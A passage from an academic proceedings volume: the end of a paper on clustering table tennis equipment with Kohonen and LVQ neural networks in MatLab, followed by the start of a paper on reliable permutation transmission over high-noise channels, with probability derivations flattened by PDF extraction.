However, the values of insignificant factors may go beyond the hypersphere on one or more axes, as they will not affect the belonging of the image to the class. Identifying such factors and removing them from the information bank will reduce the presence of noise effects in solving problems (1)–(2), reduce the learning time of the neural network and increase the accuracy of identification. One of the main features that should be taken into account when developing models and methods for analyzing the table tennis market is the variety of factors and the high power of their values. Modeling based on the use of artificial neural networks is invariant to such features of the information bank, the result of which will not be expressed by the dependence (1) in an analytical form, but it will allow solving the problems of analysis and selection of table tennis equipment. Using an artificial neural network for identification, the researcher is not limited by any conditions that are inherent in other analytical methods. To solve clustering problems, Kohonen network is most often used, or one of its variants - Kohonen self-organized map. As a result of training Kohonen network, a set of maps is built, each of which is a two-dimensional grid of nodes placed in a multidimensional space. The task of its training is to adjust the activation coefficients in such a way as to activate the same neuron for similar input vectors. Weighting coefficients are adjusted by an iterative algorithm, in which various heuristic techniques are used for adequate training, which allow to obtain a stable and suboptimal solution for a minimum number of iterations.
Self-organization of the Table Tennis Market
167
Algorithms of Kohonen network learning technology include procedures for the correct distribution of kernel density using the convex combination method, artificial reduction of the activity of winning neurons, redistribution of weight coefficient values among neurons in a certain neighborhood. As a result of using Kohonen network, research objects are divided into classes. The basis of such a division is the vectors of the values of the object’s parameters, and when solving our problem, these will be the values of the internal factors that characterize the table tennis equipment. The disadvantages of Kohonen network include the implicit definition of class centers and problems with the convergence of the iterative process. The advantage is the absence of any restrictions on the application and ease of use of the trained network. Taking into account the above, we use Kohonen network [10] (Fig. 3) for clustering. The following functions are used in the network architecture: P is an input vector; TDL is a tapped delay line; IW is an input weight matrix; b is the displacement of the neuron; C is a neural transfer function; a is the output vector.
Fig. 3. Architecture and functions of Kohonen network
Kohonen network is called after the Finnish scientist Teivo Kohonen. It implements the principle of learning without a teacher [11] and the result of its operation is the formation of classes and the assignment of research images to them. Network training is based on the characteristics of reference samples of rackets. The Butterfly Viscariya blade with Butterfly TEnergy 05 rubbers can be used as a reference sample for the attacking game. The values of the bat characteristics are formed on the basis of user feedback [1, 2] and expert assessments. The result of training is the formation of a list of equipment with properties close to the reference sample. The algorithm for creating, training and modeling for MatLab is as follows: net = newc(pr, s, klr), net.trainParam.epochs = 3000, net = newc(pr, s, klr), net = train(net, p),
168
V. Tazetdinov et al.
a = sim(net, p), ac = vec2ind (a). Kohonen’s network is a single-layered network [11]. It is created as a result of performing a function newc(pr, s, klr), where pr is the matrix of minimum and maximum elements of the input vectors, s is the number of clusters (neurons), klr is the learning rate. Network training is carried out by the function train(net, p), where p is the table of initial data, the number of training cycles is 3,000. Simulation of network [12] operation after training is performed by functions: a = sim(net, p), ac = vec2ind (a). Vector elements ac contain class numbers of input images. The architecture of the system and the functions used in the construction of Kohonen network [13] are shown in Fig. 3. Its training is to adjust the weights in a certain way. The following functions are used: negdist is the calculation of the negative Euclidean distance of the weights from the input image; netsum is the calculation of activation; compet is the identification of the neuron that “won”. Assume that the number of input images is m, and the number of clusters is k. As a result of modeling we obtain a vector = (q1 , q2 , . . . , qm ), where qi ∈ {1, 2, . . . , k} i = 1, m, is the number of the cluster to which the i-th input image belongs. Obviously, the number of clusters must be greater than two or equal to two. In our task, it will also not exceed the number of input factors n+1. If the factor is insignificant, then, regardless of the number of clusters, it will not affect the belonging of the image to a particular cluster. To check the significance of the factors X1 , X2 , . . . , Xn , it is necessary to perform the algorithm above for the table of initial images p at different values of s. . Each image will be assigned a number (class number), that is, a representation is performed: j
Pi → Ki , i = 1, m,j = 2, n + 1,
(9)
where i is an image number; j is the number of clusters. Next we find the correlation matrix R of the following vectors: X1 , X2 , . . . , Xn , Z, K 2 , K 3 , . . . , K n+1 . only elements will be needed for further analysis Of the entire matrix R = (rij )2n+1 i,j rij , i > n + 1, j ≤ n + 1. Find the sum of their absolute values in the columns: Sj =
n+1 rij , j = 1, n + 1.
(10)
i=1
To form a vector ofsignificant factors, it is necessary to specify some positive number C ∈ min Cj , max Cj and remove all factors whose corresponding values Sj < C. The j
j
accuracy that will be lost as a result of such a procedure is compensated by increasing the learning speed of the neural network and reducing the presence of noise effects. Thus, the
Self-organization of the Table Tennis Market
169
definition of the vector of significant input factors ends the first stage of self-organization of the information bank of table tennis equipment. The next step is to identify those images that are needed for consideration by buyers (players). Given that the information bank contains a significant number of records, as well as the fact that, despite the removal of insignificant factors, the number of remaining factors is several dozen, the search for the necessary information will take a long time. We will establish that the information on table tennis equipment (blades and rubbers), which are contained in information bank, belongs to two classes: the first contains equipment, which the player would like to buy, the second - which does not interest him. We offer the following procedure for classification and determination of the required equipment. From the entire general set of equipment data, we will randomly determine the population of representatives. If the equipment is of interest to the client, we refer it to the first class, if not we refer it to the second class. Note that the representative population must be representative; otherwise the accuracy of the classification may be low. Using this procedure and class information, we perform the neural network learning procedure, which in MatLab is as follows: net = newlvq(pr, s1, lr), P = p1 p2 . . . ph , Tc = [2 1 . . . 2], net.trainParam.epochs = 1000, net.trainParam.lr = 0.05, net = train(net, p), a = sim(net, P, Tc ). The function creates an LVQ network [14] for the classification of input vectors (Learning Vector Quantization). As a rule, such a network performs clustering and classification [15] of input vectors, and is also a development of self-organizing Kohonen networks. The parameter pr is an array of minimum and maximum values of input vectors, s1is the number of neurons in the competing layer, lr is tuning speed factor, P is the vector of representatives, Tc is the vector of ones and twos, which determine whether or not representatives belong to the desired class. Network learning [16] is done using a function. LVQ - the network has two layers: competing and linear ones. As a result of the training, the weights are adjusted so that the representatives correspond to the classes. After learning [17] the network, it is very easy to make sure that it performs the classification correctly. To do this, it is just enough to simply specify the following
170
V. Tazetdinov et al.
commands: Y = sin(net, P), Yc = vec2ind (Y ). The result of their execution should be the vector Yc that coincides with the vector Tc . After checking and making sure that the classification is correct, the network can be used to determine whether table tennis equipment (blade or rubbers) belongs to the appropriate class. This operation corresponds to the execution of a sequence of commands: P1 = p1 , Y1 = sin(net, P1 ), Y1c = vec2ind (Y1 ), where P1 is the control image. Given that the input of the neural network [18] can be consistently supplied with the values of factors that contain information about all the names of equipment placed in the information bank [19] and get the output value, which will indicate that the piece of equipment belongs to the desired class, the classification problem will be completely solved. The features of the selection of table tennis equipment are that the buyer (player) pays attention to the importance of certain factors that he considers important. Other factors often go unnoticed. Determining factors are speed, spin, control, delay time of the ball on the racket, the design of the blade and others. Therefore, when forming a set of acceptable equipment options, they often focus on the value of one of the input factors, which is the index. Next, the object is selected from this set according to the optimal composition of other factors. The method proposed above makes it possible to optimize this procedure in time. Its practical application in real problems is possible when using information-analytical systems focused on a specific database with developed algorithms for the operation of the considered networks. Its practical application in real problems is possible when using information-analytical systems focused on a specific database with developed algorithms for the networks under consideration.
4 Experiments To check the effectiveness of the developed method, we will consider the real data of the table tennis equipment. Let’s make a selection from the general set of table tennis blades [2, 3]. The number of elements in it is 50. Among all factors, we will choose the following: X1 is a blade thickness, X2 is speed, X3 is control, X4 is a number of layers, X5 is weigh, Z is a complex parameter, which takes into account speed, rotation and control. In order to find non-significant factors, we use Kohonen network training
Self-organization of the Table Tennis Market
171
algorithm four times for the number of clusters K1 = 3, K2 = 4, K3 = 5, K4 = 6. Each table tennis blade is assigned to a specific class. In the next step, the elements of the correlation matrix are found (Table 1). Having set the constant C equal to four and calculating the sum of the absolute values (11) on the columns of the matrix, we make sure that the corresponding values for the factors X1 , X 2 , X3 , X4 , X5 , Z are greater than C. This indicates that the number of layers X4 is an insignificant factor and can be removed from the database. Table 1. Correlation coefficients X1
X2
X3
K1
0.6832
0.5507
0.6338
K2
0.4761
0.4473
K3
0.7325
0.7265
K4
0.7080
0.6851
X4
X5
Z
0.0270
0.3908
0.5910
0.5033
–0.0872
0.3745
0.4381
0.7304
–0.1120
0.4274
0.5592
0.6734
–0.1535
0.3987
0.5897
5 Results The result of the research is the development of the Neuro TT information and analytical system. The structure of the NeuroTT system and modular filling, as well as the features of the work are discussed in [20]. At the same time, the main purpose of the system is to provide advisory services to customers (players) by analyzing statistical information. Working with the information-analytical system has certain features (Fig. 4). Thus, the science-intensive nature of the transformations carried out by the system should be smoothed out by the features of a friendly user interface. And if the input of inventory information by the operator is not different from the usual work with database tables, the client’s work requires some adaptation to the formalized presentation of information. Given that the same software and modules are used to solve problems of analysis and selection of table tennis equipment, they form the core of the system. As the NeuroTT system is open to changes and additions, it can be modified in each case according to individual tasks. The integration of kernel library functions and additional module functions is carried out from user interface applications, the functions of these levels can interact only through the data bank.
172
V. Tazetdinov et al.
Fig. 4. Technology of interaction with NeuroTT system
6 Discussion Summarizing the above, we note that the self-organization of information bank allows optimizing powerful databases in an environment of great diversity of information. These algorithms give possibility even faster to choose the right equipment according to certain criteria. One of the main functions of the NeuroTT system is the selection of the necessary equipment. Once the required dependencies are identified, you can query in the form “and if A, what…?”. Anticipating possible scenarios for the development of the table tennis market simplifies decision-making processes and increases their reliability. As a result of the study, we have managed to reduce the information entropy of factors and the presence of noise effects. A method for self-organization of the information bank based on the result of solving the clustering problem, which is obtained using Kohonen self-organizing network, has been developed. According to estimates, the practical use of the developed method gives an acceleration of 20% when executing the corresponding requests. The proposed method is a continuation of the work on solving the problems of analysis of complex systems, which is the table tennis market. The method successfully uses and continues the ideas presented in [6]. Comparing the proposed method with existing similar ones [7], we can say that the proposed method is not so demanding on the input data. This is explained by the very nature of neural networks [9]. The artificial neural network makes modeling invariant to the variety of factors and the high power of their values.
Self-organization of the Table Tennis Market
173
Investigating table tennis market, we note a significant uncertainty associated with the variety of factors that are deterministic, probabilistic-statistical, and subjective. Their composition is important for solving the problems of analysis and selection of table tennis equipment. At the same time, the task of formalizing and reducing the factors to a form suitable for calculations is complex and ambiguous, because the determined factors have either numerical values or those that are reduced to them; probabilistic-statistical factors are characterized by values and their probabilities; the determination of subjective factors requires expert support and the application of fuzzy set theory methods. Adequate analysis in table tennis market is possible under the condition of creating and using automated systems with proposed method of self-organization. The results of such automated systems will affect the reduction of entropy in the initial data and will be a means of supporting decision-making in the processes of selection of table tennis equipment, its dependence on external and internal factors. Future work will focus on the creation of an online automated NeuroTT system, which will allow to select table tennis equipment using the proposed method.
7 Conclusions The scientific novelty of the obtained results is based on the fact that, for the first time, the models for analyzing table tennis equipment market based on the principles of selforganization and paradigms of biocybernetics are proposed; for the first time, a neural network method of information bank self-organization, the core of which is the results of solving the clustering problem, is developed. The proposed method of extracting insignificant factors on the basis of neural network technologies is another option for optimizing powerful databases. Its advantages are that the neural network without the mediation of an expert determines what information can be extracted without increasing entropy and what factors are secondary when choosing table tennis equipment. The number of calculations is significantly reduced when determining database records that meet customer requirements. Traditionally, this required checking all records for each field to meet a certain criterion. With the new method, it is enough to teach the neural network to classify equipment on reference images, and then only use it in direct mode to determine the belonging to certain classes of all objects contained in the database. Thus, formalized formulations of tasks for analyzing table tennis market are performed, which include: identification of a parameter that takes into account speed, rotation and control and determination of sensitivity coefficients for changing a parameter, which determines the playing properties of the bat to change exogenous factors. Neural network models and methods of self-organization of the information bank are offered. The need for their use is caused by information redundancy and noise effects. Based on the repeated use of Kohonen network to solve the problem of clustering, a method of extracting insignificant factors from the data bank has been developed. The proposed method gives an acceleration of 20%.
References 1. Rubber Reviews. https://revspin.net/rubber/
174 2. 3. 4. 5.
6. 7. 8. 9.
10.
11. 12.
13. 14. 15.
16.
17. 18. 19.
20.
V. Tazetdinov et al. Blade Reviews. https://revspin.net/blade/ The Database of Table Tennis Blades Compositions. https://stervinou.net/ttbdb/index.php/ Landyk, V.I.: Sports Training Methodology: Table Tennis. NordPress, Donetsk (2005) Tazetdinov, V.A.: Automation of the process of selection of equipment for table tennis using neural network systems. Komputerno-Integrovani Tekhnologii: Osvita, Nauka, Vyrobnyztvo: Sci. J. 32, 81–84 (2018) Hertz, J.A.: Introduction to the Theory of Neural Computation. CRC Press (2018) Suzuki, H., Suguru, A.: Self-organization of associative database and its applications. Neural Information Processing Systems (1987) Hlybovets, M.M., Oletsky, O.V.: Artificial Intelligence. Academiya, Kyiv (2002) Jahnavi, M.: Introduction to Neural Networks, Advantages and Applications, towards Data Science (2017). https://towardsdatascience.com/introduction-to-neural-networks-adv antages-and-applications-96851bd1a207 Ahalya, G., Pandey, H.M.: Data clustering approaches survey and analysis. In: International Conference on Futuristic Trends on Computational Analysis and Knowledge Management (ABLAZE), IEEE, pp. 532–537 (2015) Li, H., Zhang, Z., Liu, Z.: Application of artificial neural networks for catalysis: a review. Catalysts 7(10), 306 (2017) Kutakh, O.P.: Research of dynamic situations and determination of their characteristics at different stages of the decision-making process. Systemni Doslidzhennya ta Informatsiyni Tekhnolohiyi. 4, 60–72 (2003) Behler, J., Parrinello, M.: Generalized neural-network representation of high-dimensional potential-energy surfaces. Phys. Rev. Lett. 98(14), 146401 (2007) Li, J., Mei, X., Prokhorov, D., Tao, D.: Deep neural network for structural prediction and lane detection in traffic scene. IEEE Trans. Neural Netw. Learn. Syst. 28(3), 690–703 (2017) Turner, A.P., Caves, L.S., Stepney, S., Tyrrell, A.M., Lones, M.A.: Artificial epigenetic networks: automatic decomposition of dynamical control tasks using topological self-modification. IEEE Trans. Neural Network. Learn. Syst. 28(1), 218–230 (2017) Qiu, M., Song, Y., Akagi, F.: Application of artificial neural network for the prediction of stock market returns. The case of the Japanese stock market. Chaos Solit. Fractals 85, 1–7 (2016) Göçken, M., Özçalıcı, M., Boru, A., Dosdo˘gru, A.T.: Integrating metaheuristics and artificial neural networks for improved stock price prediction. Expert Syst. Appl. 44, 320–331 (2016) Rumelhart, D.E., Hinton, G.E., Williams, R.J.: Learning representations by back-propagating errors. Nature (London) 323, 533–536 (1986) Fox, G.C., Koller, J.G.: Code generation by a generalized neural network: General principles and elementary examples.J. Parallel Distrib. Comput. (1989). https://doi.org/10.1016/07437315(89)90066-X Tazetdinov, V.A., Sysoienko, S.V.: Neural network system for selection of table tennis equipment. Visnyk Cherkaskogo Derzhavnogo Tekhnolohichnogo Universytetu 1, 79–85 (2021). https://doi.org/10.24025/2306-4412.1.2021.225999
Information and Communication Systems and Networks
A Method for Reliable Permutation Transmission in Short-Packet Communication Systems Emil Faure1,2(B) , Anatoly Shcherba1 , Bohdan Stupka1 , Iryna Voronenko3 , and Alimzhan Baikenov4 1 Cherkasy State Technological University, Cherkasy, Ukraine
[email protected] 2 State Scientific and Research Institute of Cybersecurity Technologies and Information
Protection, Kyiv, Ukraine 3 National University of Life and Environmental Sciences of Ukraine, Kyiv, Ukraine 4 Almaty University of Power Engineering and Telecommunications named after Gumarbek
Daukeyev, Almaty, Kazakhstan
Abstract. The paper describes the research, development, and implementation of a method for permutation transmission over communication channels with a bit error probability close to 0.5. The developed method can be used for communication systems with non-separable factorial coding, in particular, to implement a three-pass cryptographic protocol based on permutations. The method uses circular shifts of the carrier permutation to represent each transmitted permutation symbol. The carrier permutation has the maximum value of the minimum Hamming distance from the binary representation of permutation to all its circular shifts. The majority and correlation processing of the fragments received from the communication channel makes it possible to implement a reliable permutation transmission under high-intensity channel noise. A mathematical model for permutation transmitting has been developed. Analytical expressions for calculating the probability of a permutation being received correctly and incorrectly are presented. An algorithm that applies the proposed method has been developed and implemented. The results of the constructed simulation software model of the data transmission system confirm the effectiveness of the developed method in comparison with the traditional DSSS method for the bit error probability equal to 0.495. Keywords: permutation · factorial coding · noise · three-pass cryptographic protocol · short-packet communications
1 Introduction Dependability [1] is considered to be one of the main features characterizing modern information systems and networks. Several information security tasks are being solved synchronously when transmitting information in multi-purpose communication © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 177–195, 2023. https://doi.org/10.1007/978-3-031-35467-0_12
178
E. Faure et al.
and control systems. Such tasks include ensuring confidentiality, integrity, and availability, called CIA [2, 3], or confidentiality, availability, controllability, and authentication, called CACA [4]. Solving the above-mentioned tasks separately is associated with applying various mathematical methods and algorithms, as well as sequential processing of information. This leads to an increasing load on the information conversion channels, growing requirements for their speed, an increasing the introduced redundancy and, as a result, to a decreasing relative transmission rate. The methodology of integrated information security based on non-separable factorial data coding [5] enables using permutations as a transport mechanism in short-packet communication systems [6–8], as well as implementing joint protection of transmitted data from communication channel errors and unauthorized access. Several attempts [9, 10] have been made to investigate the ability of a non-separable factorial code to detect and correct communication channel errors. The efficiency of the code has been proven. It is achieved, among other factors, due to the code synchronization properties [11, 12]. Along with the above, the considered properties do not enable using non-separable factorial coding in data transmission systems with high noise and a bit error probability close to 0.5. In addition, some applications [6, 13–16] require higher reliability scores. Such applications include protocols for data transmission under conditions of high noise (low SNR) [17, 18], as well as three pass cryptographic protocols [19–22], in particular, a three pass cryptographic protocol based on permutations [23]. In three pass protocols, the data is transmitted three times to communicate one message, which increases the probability of the data being affected by channel noise. Error detection property of a non-separable factorial coding can be improved by introducing additional redundancy. The use of existing error-correcting codes [24–27] for this purpose can have a positive effect. However, the use of such codes is limited when the bit error probability is close to 0.5. In such cases, it is worth considering that the non-separable factorial code is redundant and detects errors by its nature [9]. The aim of this study is to provide a reliable transmission of permutations that is resistant to the impact of a high-level noise, resulting in a bit error probability close to 0.5. This study uses circular shifts of the carrier permutation to represent each transmitted permutation symbol. The carrier permutation has the maximum value of the minimum Hamming distance from the binary representation of permutation to all its circular shifts. Furthermore, a majority and correlation processing of data fragments received from the communication channel has been introduced to recognize permutation. To evaluate the developed method for reliable permutation transmission, a Python software model has been constructed. This paper is organized as follows. Section 2 provides the basic concepts for transmitter data structure, permutation recognition, theoretical assessment of probabilistic indicators, and details an outline of the method for error-correcting permutation transmission. Section 3 presents a case study for implementing the method for reliable permutation transmission. Section 4 gives the results of the method evaluation through simulation. Section 5 discusses the results and compares them with DSSS system indicators. Section 6 summarizes the findings and concludes the paper.
A Method for Reliable Permutation Transmission
179
2 Materials and Methods The study [9] shows that the codewords of a non-separable factorial code belong to a subset within the set of permutations {π } of length M . Permutation symbols are encoded by a fixed-length binary code with a codeword length lr = log2 M . Here, we will explain the principle for constructing a reliable data transmission system on an example of using permutation π of length M = 8, or sequence of decimal characters of the set {0, 1, 2, 3, 4, 5, 6, 7}. Each character in this set is encoded with lr = log2 M = 3 bits, for instance, as Table 1 shows. Then the length of each permutation represented in a binary notation is equal to n = M · lr = 24 bits. Table 1. Permutation character encoding scheme Decimal notation
0
1
2
3
4
5
6
7
Binary notation
000
001
010
011
100
101
110
111
Let πi (j) denotes the permutation πi circular shift to the left by j bits, while dij denotes the Hamming distance from the permutation πi to its circular shift πi (j), whereas 0 ≤ i ≤ M ! − 1, 1 ≤ j ≤ n − 1. At the same time, di = min dij and d = max(di ) = j i max min dij . i
j
Definition 1. A letter Lj is a circular shift πi (j) of such a permutation πi , which has the Hamming distances to all its circular shifts not less than d : ∀dij ≥ d . Remark 1. In the model example chosen for the study, we shall use the permutation πi = {0,1,7,3,2,5,4,6} = {000,001,111,011,010,101,100,110} to generate letters Lj . This permutation we have obtained from [12]. Definition 2. A word W is a permutation of letters Lj . Remark 2. Either all or some of the letters Lj may be used to form the word W . The number of letters in the word determines its length, which will be denoted by N , N ≤ n. The Hamming distance between L0 and Lj will be denoted by dj . Remark 3. For the model example used in this study, the permutation length M = 8, and the word W will be generated of 23 Lj letters, where 1 ≤ j ≤ 23. 2.1 Word Recognition In this study, we will apply the majority and correlation processing [12] of the received data to enhance its reliability. The majority processing method involves multiple repetition of the word and accumulating its reception result. The accumulation factor
180
E. Faure et al.
l = 3, 5, 7 . . . is equal to the number of repeated words. The receiver accumulates data fragments. The length of each fragment is equal to the length of the word. Based on l received fragments, sequence R is obtained, consisting of N sequences Rj , where j ∈ [1, N ]. The length of each sequence Rj is equal to the letter length. Each bit of the sequence R is calculated from the corresponding bits of the received fragments. If the i -th fragment bits contain more binary ‘ones’, this i -th bit of the sequence R takes the value of ‘one’, in the opposite case it takes the value of ‘zero’. The correlation processing involves calculating the Hamming distances from each sequence Rj , where j ∈ [1,N ], to all letters used by the transmitter. If this distance does
not exceed value dlim = (d −1) to one of the letters, this letter corresponds to the 2 sequence Rj . For the model example, the Hamming distances between the permutation πi = {0,1,7,3,2,5,4,6} and its bit circular shifts are at least d = 12, whence dlim = 5. If the different source letters correspond to the different sequences Rj , where j ∈ [1, N ], then the received word is a permutation of these letters. If this permutation is used by the source, then the word is issued to the consumer. 2.2 Probability of Correct and Incorrect Word Recognition The bit error probability in the refined sequence R following majority processing of l fragments received from the communication channel with the bit error probability p0 is equal to p0∗ =
l i= (l+1) 2
Cli p0i (1 − p0 )l−i .
(1)
In cases when l ≥ 1, 027, it would be expedient to use the approximation formula (2) mentioned in [12] to determine p0∗ . The probability of correct letter recognition is determined by the probability of up to dlim errors in the refined sequence R: PL_true =
dlim ν=0
ν n−ν Cnν p0∗ 1 − p0∗ .
(2)
A correct recognition of a word with length N is only possible when all N letters are recognized correctly. The probability of this event is N PWtrue = PL_true .
(3)
Graphs PW _true (l) for this paper model example with πi = {0,1,7,3,2,5,4,6} and N = 23 at varying values p0 are presented in Fig. 1. Based on the nature of the dependences shown in Fig. 1, the accumulation factor can vary over a wide range to achieve a given probability of correct synchronization. Thus, to achieve PW _true ≥ 0.999 when p0 = 0.1, an accumulation factor l = 3 is required, p0 = 0.3 requires l = 21, p0 = 0.45 requires l = 363, and p0 = 0.495 requires l = 36, 413. Therefore, the proposed in this paper approach to processing the received data provides for accumulating n -bit fragments received from the communication channel,
A Method for Reliable Permutation Transmission
181
fragments majority processing, and processing letters and words. The maximum value of the accumulation factor l is determined by the maximum bit error probability the data transmission system is designed for, as well as by the specified minimum probability of correct word recognition. When creating a data transmission system, it is necessary to consider the probability of an undetected error occurring in the received word. Here, we determine this probability.
Fig. 1. Probability of a word being received correctly, depending on the number of accumulated fragments, for different bit error probabilities: (a) p0 ≤ 0.45; (b) p0 ≥ 0.47
182
E. Faure et al.
Theorem 1. The probability for a letter to be recognized incorrectly
N −1 dj v−dj +dlim C w p∗ v+w × n−dj 0 v PL_false = C LWj · , n−(w+v) j=1 v=dj −dlim dj w=0 × 1 − p0∗
(4)
where LWj is the coefficient indicating that the letter Lj belongs to the subset of letters to form words. If Lj is used to form a word then LWj = 1, while in the opposite case LWj = 0. Proof. To prove this theorem, we have chosen the approach applied in Theorem 3 in the literature [12]. The probability that an error leading to incorrect letter reception occurs in the refined sequence R is equal to the probability for any of the error vectors to occur in the refined sequence R, converting the letter into any of the remaining N − 1 with an accuracy of dlim bits. Thus, we keep in mind that dj is the Hamming distance from letter L0 to letter Lj , circular shift L0 by j bits. Then the error converts the letter L0 intoits circular shift Lj if these sequences differ, whence d − d ≤ ν ≤ dj . it contains ν errors in dj bits where j lim bits, additional w bit errors are probable, while Moreover, in the remaining n − d j 0 ≤ w ≤ ν − dj − dlim . The probability of the event therefore constitutes:
PL_false
⎛ ⎛ ⎞⎞ v d −v Cdvj p0∗ 1 − p0∗ j × N −1 ⎜ dj ⎜ ⎟⎟ w = C w p∗ × ⎠⎠. ⎝LWj · ⎝ j=1 v=dj −dlim × v−dj +dlim n−dj 0 w=0 n−dj −w × 1 − p0∗
(5)
By grouping the factors in (5), we shall obtain a formula to determine the probability for the letter to be recognized incorrectly (4). Remark 4. As it has been demonstrated in the study [12], in permutation πi = {000,001,111,011,010,101,100,110} with dlim = 5 values dij = 12 occur in 19 cases, values dij = 14 occur in two cases, and values dij = 16 occur in two cases. Thus, in case of using all 24 circular shifts of the indicated permutation to form a word, Eq. (4) will take the following form: 24−v−w v−7 w ∗ v+w v 1 − p0∗ PLfalse = 19 12 v=7 C12 w=0 C12 p0 v−9 w ∗ v+w v ∗ 24−v−w p 1 − p C C (6) +2 14 v=9 14 0 w=0 10 0 16 v+w 24−v−w v−11 v w ∗ . 1 − p0∗ +2 v=11 C16 w=0 C8 p0
A Method for Reliable Permutation Transmission
183
In case of using 23 circular shifts of the permutation πi = {000,001,111,011,010,101,100,110} to form a word, the upper bound for the probability of incorrect letter recognition can be estimated as follows: v−7 w ∗ v+w v ∗ 24−v−w PLfalse ≤ 19 12 p 1 − p C C v=7 12 w=0 12 0 0 24−v−w 14 v v−9 w ∗ v+w ∗ +2 v=9 C14 1 − p0 C p (7) w=0 10 0 24−v−w 16 v−11 w ∗ v+w v ∗ + v=11 C16 . 1 − p0 w=0 C8 p0 In case of using N , where 2 ≤ N ≤ n, circular shifts of the permutation πi = {000, 001, 111, 011, 010, 101, 100, 110}, the upper bound for the probability of incorrect letter recognition can be estimated as follows: 12 24−v−w v−7 w ∗ v+w v PL_false ≤ (N − 1) 1 − p0∗ C12 C12 p0 . (8) v=7
w=0
Remark 5. In this study model example, formula (7) was used when performing numerical calculations to determine the probability for a letter to be recognized incorrectly. Theorem 2. Probability for a word to be received incorrectly. P(W _false) =
N
j
CN
(j=2)
where !j = j!
j i=0
(−1)k k!
P(L_false) (N − 1)
j
N −j
· !j · PL_true ,
(9)
is the subfactorial of j.
Proof. The probability of an error occurring in a word and leading to the word incorrect reception is equal to the probability of permuting two or more letters in the word. The remaining letters are recognized without errors. In this case, the probability of a word being received incorrectly. PWfalse =
N
j N −j C Pder_j PL_true , j=2 N
(10)
where Pder_j is the probability of an error resulting in a j letters permutation without fixed points (probability of a derangement of j letters). This probability is defined as follows. The probability of transforming a letter into a certain other letter belonging to a subset of the letters constituting the word is PL_false /(N − 1). The number of derangements of length j is equal to subfactorial !j. Then j the probability of a derangement occurring in j letters is equal to PL_false /(N − 1) ·!j. By substituting this equation into (10), we shall obtain the formula to find the probability for a word to be recognized incorrectly (9).
184
E. Faure et al.
By substituting the upper bound PL_false from (7) into (9), we obtain the upper bound for PW _false for the study example. Figure 2 shows graphs of estimates PW _false (l) for the model example with πi = {0,1,7,3,2,5,4,6} and N = 23 for various values of p0 .
Fig. 2. Probability of a word being received incorrectly, depending on the number of accumulated fragments, for different bit error probabilities: (a) p0 ≤ 0.45; (b) p0 ≥ 0.47
Note that all graphs in Fig. 2 contain maximum points. These points correspond to different accumulation factor l values. The maximum values of PW _false (l) for p0 ≤ 0.495 are shown in Table 2.
A Method for Reliable Permutation Transmission
185
Table 2. Maximum values of PW _false (l) p0
max PW _false (l) p0
max PW _false (l)
0.1
0.2
0.3
0.4
0.43
2.53101 · 10−8
3.44773 · 10−8
1.03869 · 10−7
1.24529 · 10−7
1.26329 · 10−7
0.45
0.47
0.475
0.48
0.495
1.26568 · 10−7
1.26569 · 10−7
1.26577 · 10−7
1.26578 · 10−7
1.26580 · 10−7
Remark 6. For the model example, PW _false (l) ≤ 1.26580 · 10−7 for ∀l at ∀p0 ≤ 0.495. Remark 7. Equations (3) and (9) determine the probabilities of correct and incorrect word reception for a separate experiment with a fixed accumulation factor l value. These expressions do not take into account the procedure for l successive increasing.
2.3 Estimating Total Interval Probabilities of a Word Being Received Correctly or Incorrectly In this part of the study, we shall assess the total interval probabilities of correct PW _true_final (l) and incorrect PW _false_final (l) word reception in ∀i ≤ l fragments. Here, we assume that event A(i) = {the receiver has recognized the word for none of the j < i accumulated fragments}. In other words, event A(i) means that i fragments have been accumulated by the receiver. Let B(i) be the event of correct word reception by i fragments, and C(i) be the event of an incorrect word reception by i fragments. In addition, with a successive increase in the number of accumulated fragments, we shall denote the event of a word being received correctly by ∀i ≤ l fragments with D(l), and the event of a word being received incorrectly by ∀i ≤ l fragments with E(l). Event D(l) represents the union of all correct word recognition events over i ≤ l fragments: B(i). (11) D(l) = i≤l
The event D(l) probability is P(D(l)) = P
i≤l
B(i) .
(12)
Note that P(D(l)) = P i≤l B(i) ≥ P(B(i)) for ∀i ≤ l. According to Fig. 1, P(B(i)) is monotonically increasing along i; then it would be advisable to choose the maximum value of P(B(i)), i ≤ l for a more accurate lower bound P(D(l)). This value is P(B(l)). Considering that P(D(l)) = PW _true_final (l) and P(B(i)) = PW _true (i), the next estimation is performed: PW _true_final (l) ≥ PW _true (l).
(13)
186
E. Faure et al.
Event E(l) is a disjoint union of all incorrect word reception events by i ≤ l fragments, multiplied by the events of accumulating i fragments by the receiver: E(l) = C(i) · A(i). (14) i≤l
The event E(l) probability is P(E(l)) = P
i≤l
C(i) · A(i) .
Since the events C(i) · A(i) are incompatible in Eq. (14), we obtain P(E(l)) = P C(i) · A(i) = P(C(i) · A(i)). i≤l
i≤l
(15)
(16)
Since P(C(i) · A(i)) ≤ P(C(i)) for ∀i ≤ l, whereas P(E(l)) = PW _false_final (l) and P(C(i)) = PW _false (i), the next estimation is performed: PW _false_final (l) ≤
i≤l
PW _false (i).
(17)
For the study model example, Fig. 3 presents the graphs reflecting the dependencies of estimates (13) and (17) for the probability of a word being received correctly and the probability of a word being received incorrectly, or the probability of an error being undetected, on the number of accumulated fragments l. Having defined the approach to recognizing a word, the next section of the paper addresses the method for reliable transmitting words of permutations proposed here.
Fig. 3. Probability of a word being received correctly or incorrectly, depending on the number of accumulated fragments
A Method for Reliable Permutation Transmission
187
2.4 Method for Error-Correcting Permutation Transmission The method includes the following stages: 1. The transmitter sequentially outputs permutation W of length N , named by the word. Each permutation symbol Lj , where 1 ≤ j ≤ N , named by the letter, is a circular shift of permutation π of length M . The permutation π must have the maximum value of the minimum Hamming distance from its n -bit representation to all of its circular shifts (e.g., for M = 8, π = (000,001,111,011,010,101,100,110) [12]). Obviously, the number of permutation π circular shifts must not be less than the permutation W length N : n ≥ N . The data transmission procedure should be preceded by the procedure for synchronizing by letters, for example, as proposed in literature [11, 12]. 2. For each letter, the receiver accumulates l fragments of n bits received from the communication channel. 3. For each letter, the refined sequences Rj , where j ∈ [1, N ], are independently calculated. Each bit of this sequence is calculated by the majority principle based on the corresponding bits of the received fragments. Thus, if the i -th fragment bits contain more ‘ones’, the i -th bit of the refined sequence is assigned value ‘one’, in the opposite case it is given a ‘zero’ value. 4. For each refined sequence Rj , where j ∈ [1, N ], the Hamming distances to the letters used by the source are calculated. If this distance does not exceed the value dlim = (d −1) to one of the letters, this letter corresponds to the j -th letter of the word W . 2 5. If all sequences Rj , where j ∈ [1, N ], correspond 